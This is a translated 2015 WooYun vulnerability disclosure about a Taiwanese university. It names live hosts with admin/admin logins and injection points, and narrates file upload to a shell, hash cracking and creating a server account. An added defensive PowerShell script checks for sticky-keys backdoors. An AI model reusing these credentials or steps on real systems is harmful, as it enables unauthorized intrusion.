
Vulnerability summary

Defect ID: wooyun-2015-097994

Title: Batch of issues at a Taiwanese university #1

Vendor: Hitcon Taiwan internet vulnerability reporting platform

Author: scanf

Submitted: 2015-02-27 15:50

Fixed: 2015-04-13 16:58

Published: 2015-04-13 16:58

Type: network design flaw / logic error

Severity: high

Self-assessed rank: 20

Status: handed to a third-party partner (Hitcon Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-02-27: details sent to the vendor, awaiting vendor handling
2015-03-03: vendor confirmed; details visible to the vendor only
2015-03-13: details opened to core white hats and domain experts
2015-03-23: details opened to regular white hats
2015-04-02: details opened to intern white hats
2015-04-13: details opened to the public

Brief description:

./.

Detailed description:

The target is National Kaohsiung University of Applied Sciences (國立高雄應用科技大學) in Taiwan:
http://www.kuas.edu.tw/bin/home.php
First, weak passwords:
http://www2.ce.kuas.edu.tw/manage/
admin/admin

[screenshot: QQ截图20150222180704.jpg]


http://www.acce.kuas.edu.tw/admin/app/cert.asp
admin/admin

[screenshot: QQ截图20150222181329.jpg]


http://3q.kuas.edu.tw/login.php
admin/admin

[screenshot: QQ截图20150222182630.jpg]


Directory traversal: http://www.che.kuas.edu.tw/admin/
Injection:
http://www.lib.kuas.edu.tw/news_full.asp?nid=1684

[screenshot: QQ截图20150222182530.jpg]


POST injection (captured request headers below):

POST /EPortfolio/Activity/UnitBsCalendar.aspx HTTP/1.1
Host: active.kuas.edu.tw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://active.kuas.edu.tw/EPortfolio/Activity/UnitBsCalendar.aspx
Cookie: ASP.NET_SessionId=trwd4nyno3weysjilyythtlh
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 16830


[screenshot: QQ截图20150222184811.jpg]


[screenshot: QQ截图20150222184758.jpg]


Because of network problems I did not dump the database, but it definitely returns data.
There is also an ASP.NET Padding Oracle vulnerability:
http://tles.kuas.edu.tw/

[screenshot: QQ截图20150222185222.jpg]


Nothing to be done about the network problems; it ran for a whole afternoon.

Proof of concept:

Entry point: http://www.acce.kuas.edu.tw/

[screenshot: QQ截图20150222183446.jpg]


Arbitrary file upload.

[screenshot: QQ截图20150222183633.jpg]


Then got a shell.

[screenshot: QQ截图20150222183832.jpg]


Then port forwarding.
Found an existing sticky keys backdoor.

[screenshot: QQ截图20150222183950.jpg]
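A sticky keys backdoor already being present on the host is a sign of an earlier compromise, so the defender-side check worth running during cleanup is whether any accessibility binary has been swapped for a shell or hijacked through Image File Execution Options. The following is an added example written for this page, not code from the report or from the university; it assumes PowerShell 4 or later (for Get-FileHash) run elevated on the host being examined.

```powershell
# Added example (not from the original report): look for the two common
# sticky-keys style backdoors on a Windows host.
#   1. the accessibility binary (sethc.exe etc.) replaced by a copy of a shell
#   2. an IFEO "Debugger" value that redirects the binary to a shell
# Assumes PowerShell 4+ and an elevated session.
$system32 = Join-Path $env:SystemRoot 'System32'
$accessibilityBinaries = @('sethc.exe', 'utilman.exe', 'osk.exe',
                           'narrator.exe', 'magnify.exe', 'displayswitch.exe')

# SHA256 of the shells an attacker typically copies over the target binary.
$shellHashes = @('cmd.exe', 'powershell.exe') | ForEach-Object {
    (Get-FileHash -Algorithm SHA256 (Join-Path $system32 $_)).Hash
}

function Find-AccessibilityBackdoor {
    $findings = @()
    foreach ($name in $accessibilityBinaries) {
        $path = Join-Path $system32 $name
        if (-not (Test-Path $path)) { continue }

        # Variant 1: replaced binary. A genuine accessibility tool never
        # hashes identically to cmd.exe or powershell.exe.
        $hash = (Get-FileHash -Algorithm SHA256 $path).Hash
        if ($shellHashes -contains $hash) {
            $findings += "$name has the same SHA256 as a system shell (replaced binary)"
        }

        # Variant 2: IFEO hijack. Any Debugger value on an accessibility
        # binary is suspicious; no legitimate setup puts one here.
        $ifeo = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\" +
                "Image File Execution Options\$name"
        $debugger = (Get-ItemProperty -Path $ifeo -Name Debugger `
                        -ErrorAction SilentlyContinue).Debugger
        if ($debugger) {
            $findings += "$name has IFEO Debugger set to '$debugger'"
        }
    }
    return $findings
}

$results = Find-AccessibilityBackdoor
if ($results.Count -eq 0) {
    Write-Output 'No accessibility-binary backdoor indicators found.'
} else {
    $results | ForEach-Object { Write-Output "SUSPICIOUS: $_" }
}
```

On a host where a finding appears, the file's creation and modification timestamps and the Security event log around that time are the next things to collect before the binary is restored from a clean source.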


Pulled the hashes down and cracked them locally.
The password is jsjs.
The date is really old.

[screenshot: QQ截图20150222184139.jpg]


Then created an account and logged into the server.
Hmm, it is a fairly large network.

[screenshot: QQ截图20150222184247.jpg]


Since this is a university on Taiwan, I did not go any deeper.

Fix recommendation:

Ops all know.

Copyright notice: when reposting, please credit scanf@乌云


Vulnerability response

Vendor response:

Severity: high

Rank: 20

Confirmed: 2015-03-03 00:04

Vendor reply:

Thanks for the report.

Latest status:

None yet